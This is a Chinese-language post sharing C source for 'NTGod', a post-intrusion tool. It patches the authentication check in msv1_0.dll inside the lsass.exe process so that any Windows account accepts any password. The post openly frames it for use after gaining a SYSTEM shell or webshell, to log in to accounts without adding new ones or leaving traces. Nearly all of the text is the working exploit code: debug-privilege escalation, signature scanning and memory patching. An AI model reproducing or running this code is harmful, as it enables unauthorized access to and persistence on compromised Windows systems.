NT上帝模式源码
//换下思路,webshell(个别变态机子)提权也可以使用,有木有?
NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。
情景再现: 当你在进行主机安全检测时,获取了SYSTEM Shell,以前会想办法获得administrator等帐号的口令,使用gina窃取、sam hash破解、增加管理帐号等,而现在直接执行 ntgodmode on 就可以轻松登录任意帐号。登录完毕后,ntgodmode off,关闭上帝模式。
#include
#include
#include
// 提权函数
BOOL EnableDebugPriv(void)
{
HANDLE hToken;
HANDLE hProcess = GetCurrentProcess();
BOOL bREt = FALSE;
if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY, &hToken) )
{
TOKEN_PRIVILEGES tkp;
if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
{
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0);
}
}
CloseHandle(hToken);
return bREt;
}
// 获取目标进程Pid
DWORD GetTargetPid(char *pn)
{
BOOL b;
HANDLE hnd;
PROCESSENTRY32 pe;
hnd = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe.dwSize = sizeof(pe);
b=Process32First(hnd, &pe);
while(b)
{
if (lstrcmpi(pn, pe.szExeFile) == 0)
return pe.th32ProcessID;
b=Process32Next(hnd,&pe);
}
return 0;
}
// 获取特征码偏移
DWORD GetSinatureAddr(char *dn)
{
HMODULE hLib;
DWORD dwSinatureAddr;
hLib = LoadLibrary(dn);
if ( hLib )
{
// 特征码校验
__asm
{
push ebx
mov dword ptr [ebx], eax
xor eax, eax
check_1_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x8B
jnz short check_1_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x4D
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 2
cmp byte ptr [eax], 0x0C
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 3
cmp byte ptr [eax], 0x49
je short check_2_start
check_1_end:
inc dword ptr [ebx]
jmp short check_1_start
check_2_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x32
jnz short check_2_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x0c0
jnz short check_2_end
mov eax, dword ptr [ebx]
push eax
lea eax, dwSinatureAddr
pop dword ptr [eax]
mov eax, dword ptr [ebx]
jmp short check__over
check_2_end:
inc dword ptr [ebx]
jmp short check_2_start
check__over:
xor eax, eax
pop ebx
}
}
else
{
printf("Failt to found the Sinature offset.\n");
return -1;
}
dwSinatureAddr = dwSinatureAddr - (DWORD)hLib;
//printf("%08x , %x\n", dwSinatureAddr, hLib);
FreeLibrary(hLib);
return dwSinatureAddr;
} // 获取msv1_0.dll在内存中的基址
DWORD GetModBase (DWORD dwTargetPid, char *dn)
{
DWORD dwModBase = NULL;
HANDLE hModuleSnap;
MODULEENTRY32 lpModInfo = {0};
BOOL bModule = NULL;
lpModInfo.dwSize = sizeof(lpModInfo);
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,dwTargetPid);
bModule = Module32First(hModuleSnap, &lpModInfo);
while ( bModule )
{
if (lstrcmpi(dn, lpModInfo.szModule) == 0)
{
dwModBase = (DWORD)lpModInfo.modBaseAddr;
//printf("%x\n", dwModBase);
break;
}
Module32Next(hModuleSnap, &lpModInfo);
}
CloseHandle(hModuleSnap);
return dwModBase;
}
// 虚拟地址转换
DWORD GetSinatureViraddr(DWORD dwSinatureAddr, DWORD dwModBase)
{
return (dwSinatureAddr + dwModBase);
}// 去密码函数
void FuckPassword (char *checkbuff, DWORD dwTargetPid, DWORD dwSinatureVirAddr)
{
HANDLE hProcess = NULL;
char buff1[] = "\xB0\x10";
char buff2[] = "\x32\xC0";
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwTargetPid);
VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, PAGE_READWRITE, &dwTargetPid);
if ( lstrcmpi("on", checkbuff) == 0 )
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff1, 2, 0);
printf("Open God Mode");
}
else
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff2, 2, 0);
printf("Close God Mode");
}
VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, dwTargetPid, &dwTargetPid);
}
// 版权函数
void CopyRightInfo()
{
printf("------------------------------------------\n");
printf("RNtGod\n");
printf("Author: Cyg07\n");
printf("Reverse from golds7n[LAG]'s NtGod\n");
printf("------------------------------------------\n");
}
int main(int argc, char* argv[])
{
CopyRightInfo();
if (argc < 2)
{
printf("Usage: %s On|OFF\n\n", argv[0]);
return 0;
}
char *DllName = "msv1_0.dll"; // Dll
char *ProcessName = "lsass.exe"; // 进程
DWORD dwModBase = NULL; // dll在内存中的基地址
DWORD dwSinatureAddr = NULL; // 特征码偏移
DWORD dwSinatureVirAddr = NULL; // 特征码的虚拟地址
dwSinatureAddr = GetSinatureAddr(DllName); // 获取特征码偏移
if ( EnableDebugPriv() == NULL ) // 进程提权
{
printf("Failt to enable debug priv.\n");
}
DWORD dwTargetPid = GetTargetPid(ProcessName); // 获取 lsass.exe 进程
// printf("%d\n", dwTargetPid);
dwModBase = GetModBase(dwTargetPid, DllName); // 获取基地址
dwSinatureVirAddr = GetSinatureViraddr(dwSinatureAddr,
dwModBase); // 转换特征码在内存的虚拟地址
// 密码处理函数
FuckPassword(argv[1], dwTargetPid, dwSinatureVirAddr);
return 0;
}